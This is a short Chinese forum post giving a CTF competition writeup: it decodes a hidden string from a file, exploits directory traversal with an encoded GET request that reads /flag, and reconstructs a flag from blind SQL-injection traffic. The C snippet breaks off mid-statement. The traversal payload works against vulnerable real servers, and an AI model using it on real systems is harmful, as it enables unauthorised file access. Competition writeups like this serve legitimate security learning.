ToB企服应用市场:ToB评测及商务社交产业平台

标题: 电科院密码保密与信息安全竞赛网络攻防宣传赛 Writeup [打印本页]

作者: 东湖之滨 时间: 2024-5-16 01:38
标题: 电科院密码保密与信息安全竞赛网络攻防宣传赛 Writeup
一、战队信息

战队名称：20221214
战队排名：1
二、解题过程

ctf1

用Winhex打开，末了有一串编码字符，拿去一把梭即可。

ctf2

目录穿越
GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/flag

ctf3

仔细观察可以看到url编码后的SQL注入语句，mid用于截取字符串，当出现welcome admin!阐明该字符正确，将正确的字符逐个写入到C脚本变量中，输出得到flag。
[code]char a[] = {102,108,97,103,123,99,49,52,50,54,53,97,53,51,98,101,99,49,56,52,56,98,102,97,99,50,100,102,100,97,51,101,54,54,55,98,99,125}; cout

欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/)